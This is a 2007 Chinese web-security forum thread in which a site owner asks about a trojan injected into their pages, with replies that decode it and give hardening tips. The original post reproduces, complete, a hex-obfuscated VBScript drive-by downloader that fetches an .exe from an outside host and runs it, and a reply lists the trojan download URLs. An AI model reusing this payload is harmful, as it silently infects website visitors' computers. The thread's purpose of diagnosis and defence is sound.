网站被挂木马,帮助啊

dottx 2007-01-30 08:27:16
被嵌入
http://www.syea.cn/css/a.js

了,看看原代码并没有对应的代码呀,他怎么弄的?

下面的脚本有什么作用?

<script language="VBScript">
S="6F6E206572726F7220726573756D65206E6578740D0A6375726C3D22687474703A2F2F69706C33382E636F6D2F646F776E2F7469616E2E657865220D0A666E616D65313D227469616E2E657865220D0A536574206466203D20646F63756D656E742E6372"
S=S+"65617465456C656D656E7428226F626A65637422290D0A64662E7365744174747269627574652022636C6173736964222C2022636C7369643A42443936433535362D363541332D313144302D393833412D303043303446433239453336220D0A7374723D"
S=S+"224D6963726F736F66742E584D4C48545450220D0A5365742078203D2064662E4372656174654F626A656374287374722C2222290D0A43313D2241646F220D0A43323D2264622E220D0A43333D22737472220D0A43343D2265616D220D0A737472313D43"
S=S+"312643322643332643340D0A737472353D737472310D0A7365742053203D2064662E6372656174656F626A65637428737472352C2222290D0A532E74797065203D20310D0A737472363D22474554220D0A782E4F70656E20737472362C206375726C2C20"
S=S+"46616C73650D0A782E53656E640D0A73313D22536372697074220D0A73323D22696E672E220D0A73333D2246696C65220D0A73343D2253797374656D4F626A656374220D0A73303D73312B73322B73332B73340D0A7365742046203D2064662E63726561"
S=S+"74656F626A6563742873302C2222290D0A73657420746D70203D20462E4765745370656369616C466F6C6465722832290D0A666E616D65313D20462E4275696C645061746828746D702C666E616D6531290D0A532E6F70656E0D0A532E77726974652078"
S=S+"2E726573706F6E7365426F64790D0A532E73617665746F66696C6520666E616D65312C320D0A532E636C6F73650D0A696620462E46696C6545786973747328666E616D6531293D74727565207468656E0D0A202020207365742051203D2064662E637265"
S=S+"6174656F626A65637428225368656C6C2E4170706C69636174696F6E222C2222290D0A20202020512E5368656C6C4578656375746520666E616D65312C22222C22222C226F70656E222C300D0A656E642069660D0A"
D=""
DO WHILE LEN(S)>1
k="&H"+LEFT(S,2)
p=CLng(k)
m=chr(p)
D=D&m
S=MID(S,3)
LOOP
EXECUTE D
</script>
<script src='http://s102.cnzz.com/stat.php?id=389476&web_id=389476' language='JavaScript' charset='gb2312'></script>
...全文
361 7 打赏 收藏 转发到动态 举报
写回复
用AI写文章
7 条回复
切换为时间正序
请发表友善的回复…
发表回复
jxf654 2007-02-04
  • 打赏
  • 举报
回复
up
紫郢剑侠 2007-02-02
  • 打赏
  • 举报
回复
是每个网页都有,还是其中一些有?
cpu24k 2007-01-31
  • 打赏
  • 举报
回复
是一段加密代码,解密之后回下载两个木马下载器:
http://www.ipl38.com/down/tian.exe
http://www.ipl38.com/down/j.exe

好像是QQ 木马。


boybottle 2007-01-31
  • 打赏
  • 举报
回复
做好安全防护啊,如果是自己的服务器要好好设置一下服务器安全,如果是空间,那就要好好把程序优化一下了,防止别人的入侵。
ianlin1977 2007-01-31
  • 打赏
  • 举报
回复
以前熊猫烧香 不就是把网页挂马!

而且还是通过 管理员上传上去的,
建议 上传更新页面的时候先保证 本地机器是干净的

这是个很容易被忽略的问题
kourr2004 2007-01-31
  • 打赏
  • 举报
回复
好好查一下网站的用户,别太相信杀毒软件,好多木马加了免杀功能,再有关闭一些危险的端口,在网上找一下是不是给人家sql注入了,看一下具体的解决办法,别用默认的sa用户名,改名.........还有数据库用户密码是不是用的MD5加密,建议再加一次密,越复杂越好,现在MD5很容易破解的,还有密码要经常换,再有看看是不是给人家用嗅探软件嗅探到了ftp密码,个人登陆系统的帐号和密码一定要经常换,最好用中文,让该死的黑客去猜吧!
zhenkui2008 2007-01-31
  • 打赏
  • 举报
回复
那你把你的原来的代码弄上去就好了啊
管那么多干什么!

9,506

社区成员

发帖
与我相关
我的任务
社区描述
Windows专区 安全技术/病毒
社区管理员
  • 安全技术/病毒社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧